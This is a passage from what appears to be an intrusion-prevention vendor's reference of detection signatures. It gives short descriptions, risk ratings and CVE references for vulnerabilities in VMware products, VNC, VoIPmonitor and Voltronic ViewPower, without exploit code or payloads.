HTTP_CRL-VMware-HCX-Listextensions-SQL-Injection

References:

CVE-2024-38814
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38814

VMware-Hyperic-HQ-Groovy-Script-Console-Java-Execution

About this vulnerability:

A vulnerability in VMware Hyperic HQ

Risk:

Moderate

First detected in:

sgpkg-ips-569-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

VMware Hyperic HQ

Type:

Code Injection

Description:

The Groovy script console in VMware Hyperic HQ 4.6.6 allows remote authenticated administrators to execute arbitrary code via a Runtime.getRuntime().exec call

Situation:

HTTP_CRL-VMware-Hyperic-HQ-Groovy-Script-Console-Java-Execution

References:

CVE-2013-6366
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6366

OSVDB-98804
http://www.osvdb.org/98804

VMware-IntraProcessLogging-DLL-ActiveX-File-Overwrite

About this vulnerability:

VMware IntraProcessLogging.dll ActiveX control allows arbitrary file overwriting

Risk:

Moderate

First detected in:

sgpkg-ips-172-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

EMC VMware

Type:

Malfunction

Description:

Certain versions of the IntraProcessLogging.dll ActiveX component shipped with VMware products contain a vulnerability which allows remote attackers to overwrite arbitrary files on the vulnerable host. The attack can be executed by tricking a user on the vulnerable host into viewing a malicious webpage with Internet Explorer.

Situation:

HTTP_SS-VMware-IntraProcessLogging-DLL-ActiveX-File-Overwrite
File-Text_VMware-IntraProcessLogging-DLL-ActiveX-File-Overwrite

References:

CVE-2007-4059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4059

BID-25110
http://www.securityfocus.com/bid/25110

VMware-Multiple-Products-Configurator-Command-Injection

About this vulnerability:

A vulnerability in VMWare Identity Manager

Risk:

High

First detected in:

sgpkg-ips-1311-5242

Last changed:

sgpkg-ips-1311-5242

Platform:

Generic

Software:

VMware Identity Manager; VMware Identity Manager Connector; VMware WorkStation One Access; VMware WorkStation One Access Connector; VMware Cloud Foundation; VMware vRealize Suite Lifecycle Manager

Type:

Input Validation

Description:

A command injection vulnerability has been reported in multiple VMware products. The vulnerability is due to improper validation of user input in the administrative configurator. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary command execution on the target server.

Situation:

HTTP_CRL-VMware-Multiple-Products-Configurator-Command-Injection

References:

CVE-2020-4006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006

VMware-OVF-Tool-Format-String-Vulnerability

About this vulnerability:

A vulnerability in VMware OVF Tool

Risk:

Moderate

First detected in:

sgpkg-ips-515-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC VMware

Type:

Format String

Description:

A format string vulnerability has been reported in VMware OVF Tool. The vulnerability is caused by insufficient sanitization when processing OVF files. By enticing a target user to open a crafted OVF file, a remote attacker can exploit this vulnerability to execute arbitrary code in the security context of the current user.

Situation:

File-TextId_VMware-OVF-Tool-Format-String-Vulnerability

References:

CVE-2012-3569
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3569

BID-56468
http://www.securityfocus.com/bid/56468

OSVDB-87117
http://www.osvdb.org/87117

VMware-Remote-Console-HOST-And-MOID-Format-String-Code-Execution

About this vulnerability:

A code execution vulnerability in VMware Remote Console

Risk:

High

First detected in:

sgpkg-ips-314-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

EMC VMware Remote Console

Type:

Format String

Description:

There is a remote code execution vulnerability in VMware Remote Console. By enticing a target user to visit a malicious web page, an attacker can execute arbitrary code with the privileges of the logged in user.

Situation:

HTTP_SS-VMware-Remote-Console-HOST-And-MOID-Format-String-Code-Execution
File-Text_VMware-Remote-Console-HOST-And-MOID-Format-String-Code-Execution

References:

CVE-2009-3732
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3732

BID-39396
http://www.securityfocus.com/bid/39396

OSVDB-63605
http://www.osvdb.org/63605

VMware-SD-WAN-Edge-Command-Injection-Vulnerability-CVE-2018-6961

About this vulnerability:

An attempt to exploit a vulnerability in VMware SD-WAN Edge detected

Risk:

High

First detected in:

sgpkg-ips-1659-5242

Last changed:

sgpkg-ips-1659-5242

Platform:

Generic

Software:

VMware SD-WAN Edge

Type:

Input Validation

Description:

VMware NSX SD-WAN Edge by VeloCloud prior to version 3.1.0 contains a command injection vulnerability in the local web UI component. This component is disabled by default and should not be enabled on untrusted networks. Successful exploitation of this issue could result in remote code execution.

Situation:

HTTP_CRL-VMware-SD-WAN-Edge-Command-Injection-Vulnerability-CVE-2018-6961

References:

CVE-2018-6961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6961

VMware-Server-Directory-Traversal

About this vulnerability:

A VMware Server Directory Traversal vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-800-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC VMware Server

Type:

Directory Traversal

Description:

A vulnerability in EMC VMware Server, versions 1.x before 1.0.10 build 203137 and 2.x before 2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5, which allows remote attackers to read arbitrary files via a directory traversal.

Situation:

HTTP_CSU-VMware-Server-Directory-Traversal

References:

CVE-2009-3733
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3733

BID-36842
http://www.securityfocus.com/bid/36842

OSVDB-59440
http://www.osvdb.org/59440

VMware-Server-Isapi-Extension-Remote-Denial-Of-Service

About this vulnerability:

A denial of service vulnerability in VMWare Server

Risk:

Moderate

First detected in:

sgpkg-ips-174-2032

Last changed:

sgpkg-ips-1589-5242

Platform:

Generic

Software:

EMC VMware Server

Type:

Input Validation

Description:

There is a vulnerability in the ISAPI extension provided by VMware Server to extend support to IIS for running Perl scripts. By supplying overly large data to the ISAPI extension iisperl.dll in a POST request, a remote attacker can terminate the IIS service and create a Denial of Service condition.

Situation:

HTTP_CS-VMware-Server-Isapi-Extension-Remote-Denial-Of-Service

References:

CVE-2008-3697
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3697

BID-30935
http://www.securityfocus.com/bid/30935

VMware-Spring-Cloud-Data-Flow-Skipper-Server-Directory-Traversal

About this vulnerability:

A vulnerability in VMWare Spring Cloud Data Flow

Risk:

High

First detected in:

sgpkg-ips-1784-5242

Last changed:

sgpkg-ips-1784-5242

Platform:

Generic

Software:

VMWare Spring Cloud Data Flow

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in VMware Spring Cloud Data Flow. The vulnerability is due to improper validation of file paths used in package uploads to the Skipper server. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary file creation or, in the worst case, remote code execution in the context of the vulnerable service.

Situation:

HTTP_CRL-VMware-Spring-Cloud-Data-Flow-Skipper-Server-Directory-Traversal

References:

CVE-2024-22263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22263

VMware-Spring-Cloud-Data-Flow-Skipper-Server-YAML-Insecure-Deserialization

About this vulnerability:

A vulnerability in VMWare Spring Cloud Data Flow

Risk:

High

First detected in:

sgpkg-ips-1790-5242

Last changed:

sgpkg-ips-1790-5242

Platform:

Generic

Software:

VMWare Spring Cloud Data Flow

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in VMware Spring Cloud Data Flow. This vulnerability is due to insufficient validation of user data in YAML files in user uploaded packages to the Skipper Server. Successfully exploiting this vulnerability could result in arbitrary remote code execution in the context of the vulnerable service without any prior authentication.

Situation:

File-Text_VMware-Spring-Cloud-Data-Flow-Skipper-Server-YAML-Insecure-Deserialization

References:

CVE-2024-37084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37084

VMware-Spring-Cloud-Gateway-Spel-Code-Injection

About this vulnerability:

A vulnerability in VMWare Spring Cloud Gateway

Risk:

Moderate

First detected in:

sgpkg-ips-1446-5242

Last changed:

sgpkg-ips-1446-5242

Platform:

Generic

Software:

VMWare Spring Cloud Gateway

Type:

Input Validation

Description:

Improper validation of user-provided SpEL expressions causes a code injection vulnerability in VMWare Spring Cloud Gateway. A successful exploit allows a remote attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-VMware-Spring-Cloud-Gateway-Spel-Code-Injection

References:

CVE-2022-22947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947

VMware-Springsource-Spring-Framework-Class.classloader-Remote-Code-Execution

About this vulnerability:

A vulnerability in VMware SpringSource Spring Framework

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1730-5242

Platform:

Generic

Software:

VMware SpringSource

Type:

Malfunction

Description:

A remote code execution vulnerability exists in the VMware SpringSource Spring Framework. The vulnerability is due to a design weakness in the web application framework. A remote attacker can leverage this weakness by sending a crafted HTTP request to a target system. In attack scenarios where code execution is successful the behaviour of the affected server depends entirely on the intention of the attacker-controlled code. This malicious code would be executed within the privileges of the affected service. Unsuccessful attack attempts may cause the targeted web application to stop responding or enter into an error state, resulting in a denial of service condition.

Situation:

HTTP_CRL-Apache-Struts-Multiple-Classloaders-Security-Bypass

References:

CVE-2010-1622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1622

BID-40954
http://www.securityfocus.com/bid/40954

VMware-User-Credential-Verification-Request-To-Authentication-Server

About this vulnerability:

A VMware Identity Manager user credential verification request to an authentication server

Risk:

Low

First detected in:

sgpkg-ips-1472-5242

Last changed:

sgpkg-ips-1478-5242

Platform:

Any Operating System

Software:

VMware Workspace ONE; VMware Identity Manager

Type:

Insecure Configuration

Description:

A VMware Identity Manager user credential verification request to an authentication server was detected. VMware Workspace ONE Access, VMware Identity Manager, and vRealize Automation have been reported to contain an authentication bypass vulnerability CVE-2022-22972, which allows an attacker to direct the verification request to an arbitrary destination. This situation can be used in a to limit the verification requests to only trusted servers.

Situation:

HTTP_CRL-VMware-User-Credential-Verification-Request-To-Authentication-Server

References:

CVE-2022-22972
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22972

VMware-Vcenter-Arbitrary-File-Read

About this vulnerability:	An attempt to exploit a vulnerability in VMware vCenter detected
Risk:	High
First detected in:	sgpkg-ips-1410-5242
Last changed:	sgpkg-ips-1410-5242
Platform:	Generic
Software:	VMware vCenter Server
Type:	Malfunction
Description:	An attempt to exploit a vulnerability in VMware vCenter detected.
Situation:	HTTP_CSU-VMware-Vcenter-Arbitrary-File-Read

VMware-Vcenter-Chargeback-Manager-Remote-Code-Execution

About this vulnerability:

Remote Code Execution vulnerability in VMware Vcenter

Risk:

High

First detected in:

sgpkg-ips-596-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

VMware vCenter Chargeback Manager

Type:

Script Injection

Description:

An unauthenticated attacker may pass malicious .jsp source code files through an unsafe file upload function and execute them remotely in the target machine.

Situation:

HTTP_CS-VMware-Vcenter-Chargeback-Manager-Remote-Code-Execution

References:

CVE-2013-3520
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3520

VMware-Vcenter-Server-Authentication-Pointer-Out-of-Range-CVE-2023-20894

About this vulnerability:

A vulnerability in VMWare vCenter Server

Risk:

High

First detected in:

sgpkg-ips-1625-5242

Last changed:

sgpkg-ips-1658-5242

Platform:

Generic

Software:

VMware vCenter Server; VMware Cloud Foundation

Type:

Input Validation

Description:

A use of out-of-range pointer offset vulnerability has been reported for VMware vCenter Server. The vulnerability is due to improper validation of the user-supplied data in DCERPC packets. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted RPC request to the target server. Successfully exploiting this vulnerability could result in memory corruption or memory access error, which could lead to code execution in the worse case.

Situation:

Generic_CS-VMware-Vcenter-Server-Authentication-Pointer-Out-of-Range-CVE-2023-20894

References:

CVE-2023-20894
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20894

VMware-Vcenter-Server-Directory-Service-Authentication-Bypass

About this vulnerability:

A vulnerability in VMware vCenter Server

Risk:

High

First detected in:

sgpkg-ips-1268-5242

Last changed:

sgpkg-ips-1552-5242

Platform:

Generic

Software:

VMware vCenter Server

Type:

Configuration Error

Description:

There exists a vulnerability in VMWare vCenter Server, versions prior to 6.7 update u3f, which allows remote attackers to gain sensitive information or add new administrative accounts, due to the incorrect implementation of access controls.

Situation:

LDAP_CS-VMware-Vcenter-Server-Directory-Service-Authentication-Bypass
LDAP_CS-VMware-Vcenter-Server-Directory-Service-Authentication-Bypass-2

References:

CVE-2020-3952
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3952

VMware-Vcenter-Server-Integer-Underflow-CVE-2024-37079

About this vulnerability:

A vulnerability in VMWare vCenter Server

Risk:

Critical

First detected in:

sgpkg-ips-1763-5242

Last changed:

sgpkg-ips-1763-5242

Platform:

Generic

Software:

VMware vCenter Server; VMware Cloud Foundation

Type:

Integer Overflow

Description:

An integer underflow vulnerability has been reported for VMware vCenter Server. The vulnerability is due to lack of validation of the calculated response header size used in subtraction. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted DCERPC packet to the target server. Successfully exploiting this vulnerability could lead to a heap buffer overflow, which could result in execution of arbitrary code in the context of the vulnerable service.

Situation:

Generic_TCP-VMware-Vcenter-Server-Integer-Underflow-CVE-2024-37079

References:

CVE-2024-37079
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37079

VMware-Vcenter-Server-Jmx-Remote-Code-Execution

About this vulnerability:

A vulnerability in VMWare vCenter Server

Risk:

High

First detected in:

sgpkg-ips-699-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VMware vCenter Server

Type:

Malfunction

Description:

There exists a code execution vulnerability in VMware vCenter Server. A remote attacker can use this to execute arbitrary code with SYSTEM privileges.

Situation:

Generic_CS-VMware-Vcenter-Server-Jmx-Remote-Code-Execution

References:

CVE-2015-2342
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2342

VMware-Vcenter-Server-Out-Of-Bounds-Write-CVE-2024-38812

About this vulnerability:

A vulnerability in VMWare vCenter Server

Risk:

Critical

First detected in:

sgpkg-ips-1818-5242

Last changed:

sgpkg-ips-1818-5242

Platform:

Generic

Software:

VMware vCenter Server

Type:

Input Validation

Description:

A pre-authenticated out-of-bounds write vulnerability has been reported for VMware vCenter Server. The vulnerability is due to insufficient validation of the metadata of the array RPC call arguments. Successfully exploiting this vulnerability could result in execution of arbitrary code in the context of the vulnerable application.

Situation:

MSRPC-TCP_CPS-VMware-Vcenter-Server-Out-Of-Bounds-Write-CVE-2024-38812

References:

CVE-2024-38812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38812

VMware-Vcenter-Server-Psc-Dataaccesscontroller-Insecure-Deserialization

About this vulnerability:

A vulnerability in VMWare vCenter Server

Risk:

High

First detected in:

sgpkg-ips-1538-5242

Last changed:

sgpkg-ips-1538-5242

Platform:

Generic

Software:

VMware vCenter Server

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in VMware vCenter Server. The vulnerability is due to lack of input validation of an encoded constraint sent to the DataAccessController endpoint of the PSC (Platform services controller). A remote, authenticated attacker can exploit this vulnerability by sending a malicious request to the target server. Successfully exploiting this vulnerability could result in remote code execution with privileges of the root user.

Situation:

HTTP_CSU-VMware-Vcenter-Server-Psc-Dataaccesscontroller-Insecure-Deserialization

References:

CVE-2022-31680
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31680

VMware-Vcenter-Server-Remote-Code-Execution

About this vulnerability:

A vulnerability in VMware vCenter Server

Risk:

Moderate

First detected in:

sgpkg-ips-1362-5242

Last changed:

sgpkg-ips-1362-5242

Platform:

Generic

Software:

VMware vCenter Server; VMware Cloud Foundation

Type:

Input Validation

Description:

There exists a remote code execution vulnerability in VMware vCenter Server. Successful exploitation could lead in arbitrary command execution.

Situation:

HTTP_CRL-VMware-Vcenter-Server-Remote-Code-Execution

References:

CVE-2021-21985
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21985

VMware-Vcenter-Server-Remote-Code-Execution-CVE-2021-21972

About this vulnerability:

A vulnerability in VMware vCenter Server

Risk:

High

First detected in:

sgpkg-ips-1324-5242

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

VMware vCenter Server; VMware Cloud Foundation

Type:

Input Validation

Description:

There exists a remote code execution vulnerability in vSphere Client component of VMware vCenter. A successful exploitation could allow the attacker to execute arbitrary code with unrestricted privileges on the operating system that hosts vCenter Server.

Situation:

HTTP_CS-VMware-Vcenter-Server-Remote-Code-Execution-CVE-2021-21972
File-Binary_Suspicious-Long-Name-In-Gnu-Tar-Archive
File-Binary_Path-Traversal-Via-Tar-Archive

References:

CVE-2021-21972
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972

VMware-Vcenter-Server-Ssooverrestverifierutil-Denial-Of-Service

About this vulnerability:

A vulnerability in VMWare vCenter Server

Risk:

High

First detected in:

sgpkg-ips-1544-5242

Last changed:

sgpkg-ips-1544-5242

Platform:

Generic

Software:

VMware Cloud Foundation; VMware vCenter Server

Type:

Resource Starvation

Description:

A denial of service vulnerability has been reported for VMware vCenter Server. This vulnerability is due to improper validation of the value stored in the TokenParts header in HTTP GET requests to vulnerable endpoints. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request with a large value in the TokenParts header to the vulnerable endpoints. Successfully exploiting this vulnerability could result in denial of service conditions on the target server.

Situation:

HTTP_CSH-VMware-Vcenter-Server-Ssooverrestverifierutil-Denial-Of-Service

References:

CVE-2022-31698
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31698

VMware-Vcenter-Update-Manager-Directory-Traversal

About this vulnerability:

A VMware Vcenter Update Manager Directory Traversal vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VMware vCenter Server

Type:

Directory Traversal

Description:

A vulnerability in VMware vCenter Server, versions 4.0 before Update 4 and 4.1 before Update 2, which allows remote attackers to read arbitrary files via directory traversal.

Situation:

HTTP_CSU_VMware-Vcenter-Update-Manager-Directory-Traversal

References:

CVE-2011-4404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4404

VMware-Vielib-ActiveX-CreateProcess-Command-Execution

About this vulnerability:

VMware vielib.dll ActiveX control allows arbitrary command execution

Risk:

Moderate

First detected in:

sgpkg-ips-172-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

EMC VMware

Type:

Malfunction

Description:

Certain versions of the vielib.dll in VMware contain an ActiveX control vulnerable to an arbitrary command execution vulnerability. The vulnerability allows remote attackers to execute arbitrary commands on a vulnerable host, and it can be exploited by tricking a user on the vulnerable host into viewing a malicious webpage with Internet Explorer.

Situation:

HTTP_SS-VMware-Vielib-ActiveX-CreateProcess-Command-Execution
File-Text_VMware-Vielib-ActiveX-CreateProcess-Command-Execution

References:

CVE-2007-4155
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4155

BID-25131
http://www.securityfocus.com/bid/25131

VMware-View-Planner-Logupload-Directory-Traversal

About this vulnerability:

A vulnerability in VMWare View Planner

Risk:

Moderate

First detected in:

sgpkg-ips-1332-5242

Last changed:

sgpkg-ips-1332-5242

Platform:

Generic

Software:

VMWare View Planner

Type:

Input Validation

Description:

Improper validation of the payload of HTTP requests to the logupload endpoint causes a directory traversal vulnerability in VMWare View Planner. A successful exploit allows an attacker to execute arbitrary code on the target with root privileges.

Situation:

HTTP_CRL-VMware-View-Planner-Logupload-Directory-Traversal

References:

CVE-2021-21978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21978

VMware-VNC-Vmwdynresolution-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in VMWare ESXi

Risk:

Moderate

First detected in:

sgpkg-ips-1039-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC VMware

Type:

Buffer Overflow

Description:

Improper processing of VNC VMWDynResolution requests causes a heap buffer overflow vulnerability in VMWare. Successful exploitation allows arbitrary code execution and in some cases with lesser success, a denial of service condition can be caused.

Situation:

Generic_CS-VMware-VNC-Vmwdynresolution-Heap-Buffer-Overflow

References:

CVE-2017-4933
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-4933

VMware-Vrealize-Log-Insight-Directory-Traversal-Vulnerability-CVE-2022-31706

About this vulnerability:

An attempt to exploit a vulnerability in VMware-vRealize Log Insight detected

Risk:

High

First detected in:

sgpkg-ips-1552-5242

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

VMware vRealize Log Insight

Type:

Input Validation

Description:

The vRealize Log Insight contains a Directory Traversal Vulnerability. An unauthenticated, malicious actor can inject files into the operating system of an impacted appliance which can result in remote code execution.

Situation:

HTTP_CRL-VMware-Vrealize-Operations-Manager-API-Certificate-Upload-Directory-Traversal

References:

CVE-2022-31706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31706

VMware-Vrealize-Operations-Manager-API-Certificate-Upload-Directory-Traversal

About this vulnerability:

A vulnerability in VMWare Cloud Foundation

Risk:

Moderate

First detected in:

sgpkg-ips-1343-5242

Last changed:

sgpkg-ips-1343-5242

Platform:

Generic

Software:

VMware Cloud Foundation; VMWare vRealize Operations Manager; VMware vRealize Suite Lifecycle Manager

Type:

Directory Traversal

Description:

There exists a directory traversal vulnerability in multiple VMware products. Successful exploitation could result in arbitrary file creation.

Situation:

References:

CVE-2021-21983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21983

VMware-Vrealize-Operations-Manager-API-Server-Side-Request-Forgery

About this vulnerability:

A vulnerability in VMWare Cloud Foundation

Risk:

Moderate

First detected in:

sgpkg-ips-1340-5242

Last changed:

sgpkg-ips-1340-5242

Platform:

Generic

Software:

VMware Cloud Foundation; VMWare vRealize Operations Manager; VMware vRealize Suite Lifecycle Manager

Type:

Malfunction

Description:

There exists a server side request forgery vulnerability in multiple products of VMware. Successful exploitation could lead in credentials disclosure.

Situation:

HTTP_CRL-VMware-Vrealize-Operations-Manager-API-Server-Side-Request-Forgery

References:

CVE-2021-21975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21975

VMware-Workspace-ONE-Access-VMSA-2022-0011-Exploit-Chain

About this vulnerability:

A vulnerability in VMware Workspace ONE.

Risk:

High

First detected in:

sgpkg-ips-1587-5242

Last changed:

sgpkg-ips-1587-5242

Platform:

Linux

Software:

VMware Workspace ONE

Type:

Input Validation

Description:

A vulnerability in VMware Workspace ONE which allows remote attackers to trigger the execution of a constructor defined in an arbitrary Java class with a controlled string argument by setting the socketFactory and socketFactoryArg properties.

Situation:

HTTP_CRL-VMware-Workspace-ONE-Access-VMSA-2022-0011-Exploit-Chain

References:

CVE-2022-22957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22957

VMware-Workspace-One-Authentication-Bypass-CVE-2022-31656

About this vulnerability:

A vulnerability in VMware Workspace ONE

Risk:

High

First detected in:

sgpkg-ips-1493-5242

Last changed:

sgpkg-ips-1493-5242

Platform:

Generic

Software:

VMware Workspace ONE

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in VMware Workspace ONE Access, Identity Manager, and vRealize Automation.

Situation:

HTTP_CSU-VMware-Workspace-One-Authentication-Bypass-CVE-2022-31656

References:

CVE-2022-31656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656

VMware-Workspace-One-Template-Injection-CVE-2022-22954

About this vulnerability:

An attempt to exploit a vulnerability in VMware Workspace ONE detected

Risk:

High

First detected in:

sgpkg-ips-1456-5242

Last changed:

sgpkg-ips-1456-5242

Platform:

Generic

Software:

VMware Workspace ONE

Type:

Input Validation

Description:

A server side template injection vulnerability has been reported in VMware Workspace ONE Access and Identity Manager. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-VMware-Workspace-One-Template-Injection-CVE-2022-22954

References:

CVE-2022-22954
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22954

VMware-Workstation-ActiveX-Control-Vielib.dll-Command-Execution

About this vulnerability:

Command execution vulnerability in VMware Workstation ActiveX Control

Risk:

High

First detected in:

sgpkg-ips-115-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

EMC VMware Workstation

Type:

Code Injection

Description:

VMware Workstation ActiveX Control has a command execution vulnerability due to insufficient data validation when processing the StartProcess method call. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, to compromise the vulnerable system.

Situation:

HTTP_SS-VMware-Workstation-ActiveX-Control-Vielib.dll-Command-Execution
File-Text_VMware-Workstation-ActiveX-Control-Vielib.dll-Command-Execution

References:

CVE-2007-4058
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4058

BID-25118
http://www.securityfocus.com/bid/25118

VMware-Workstation-ActiveX-Partition-Table-Delete

About this vulnerability:	VMware Workstation ActiveX service allows partition table deletion
Risk:	Moderate
First detected in:	sgpkg-ips-172-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	EMC VMware Workstation
Type:	Insecure Configuration
Description:	Certain versions of the VMware Workstation allow remote attackers to clear the hard drive partition table by calling an ActiveX function. The attack can be executed by tricking a user on the vulnerable host into viewing a malicious webpage with Internet Explorer.
Situation:	HTTP_SS-VMware-Workstation-ActiveX-Partition-Table-Delete-Exploit File-Text_VMware-Workstation-ActiveX-Partition-Table-Delete-Exploit

VNC-Usage

About this vulnerability:	VNC usage detection.
Risk:	Low
First detected in:	sgpkg-ips-28-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	VNC
Type:	Remote Control
Description:	This vulnerability is referenced by fingerprints that detect VNC remote control connections. VNC can be used to remotely control graphical user interfaces, and unknown VNC servers inside a network may pose security risks.
Situation:	Generic_VNC-Remote-Control-Connection

Voipmonitor-SQL-Injection-CVE-2022-24260

About this vulnerability:

A vulnerability in VoIPmonitor

Risk:

High

First detected in:

sgpkg-ips-1501-5242

Last changed:

sgpkg-ips-1501-5242

Platform:

Generic

Software:

VoIPmonitor

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in the VoIPmonitor GUI. A remote attacker can use this vulnerability to obtain administrator privileges.

Situation:

HTTP_CRL-Voipmonitor-SQL-Injection-CVE-2022-24260

References:

CVE-2022-24260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24260

Voltronic-Power-Viewpower-Getmodbuspassword-Information-Disclosure

About this vulnerability:

A vulnerability in Voltronic Power ViewPower

Risk:

Moderate

First detected in:

sgpkg-ips-1701-5242

Last changed:

sgpkg-ips-1701-5242

Platform:

Generic

Software:

Voltronic Power ViewPower Pro

Type:

Malfunction

Description:

A information disclosure vulnerability has been reported in Voltronic Power ViewPower. The vulnerability is due to exposing dangerous method getModbusPassword in the RMI service. A remote, unauthenticated attacker could exploit this vulnerability by sending RMI requests to the target server. Successful exploitation could result in password leak of ModBus communication.

Situation:

Generic_CS-Voltronic-Power-Viewpower-Getmodbuspassword-Information-Disclosure

References:

CVE-2023-51587
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51587

Voltronic-Power-Viewpower-Pro-Automatchmac-Command-Injection

About this vulnerability:

A vulnerability in Voltronic Power ViewPower Pro

Risk:

High

First detected in:

sgpkg-ips-1678-5242

Last changed:

sgpkg-ips-1678-5242

Platform:

Generic

Software:

Voltronic Power ViewPower Pro

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Voltronic ViewPower Pro. The vulnerability is due to improper validation of parameters when processing requests sent to autoMatchMac endpoint. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in command injection under the security context of SYSTEM.

Situation:

HTTP_CRL-Voltronic-Power-Viewpower-Pro-Automatchmac-Command-Injection

References:

CVE-2023-51572
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51572

Voltronic-Power-Viewpower-Pro-Selectdevicelistby-SQL-Injection

About this vulnerability:

A vulnerability in Voltronic Power ViewPower Pro

Risk:

Moderate

First detected in:

sgpkg-ips-1728-5242

Last changed:

sgpkg-ips-1728-5242

Platform:

Generic

Software:

Voltronic Power ViewPower Pro

Type:

Input Validation

Description:

Improper input validation in the selectDeviceListBy method causes an SQL injection vulnerability in Voltronic Power ViewPower Pro. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Voltronic-Power-Viewpower-Pro-Selectdevicelistby-SQL-Injection
Generic_CS-Voltronic-Power-Viewpower-Pro-Selectdevicelistby-SQL-Injection

References:

CVE-2023-51595
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51595

Voltronic-Power-Viewpower-Pro-Selecteventconfig-SQL-Injection

About this vulnerability:

A vulnerability in Voltronic Power ViewPower Pro

Risk:

Moderate

First detected in:

sgpkg-ips-1694-5242

Last changed:

sgpkg-ips-1694-5242

Platform:

Generic

Software:

Voltronic Power ViewPower Pro

Type:

Input Validation

Description:

Improper input validation in the selectEventConfig method causes an SQL injection vulnerability in Voltronic Power ViewPower Pro. A successful exploitation allows an attacker to execute arbitrary SQL on the target system and possibly execute arbitrary code with the privileges of the target service.

Situation:

Generic_CS-Voltronic-Power-Viewpower-Pro-Selecteventconfig-SQL-Injection

References:

CVE-2023-51586
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51586

Voltronic-Power-Viewpower-Pro-UpdateManagerPassword-Authentication-Bypass

About this vulnerability:

An attempt to exploit a vulnerability in Voltronic ViewPower Pro detected

Risk:

High

First detected in:

sgpkg-ips-1681-5242

Last changed:

sgpkg-ips-1681-5242
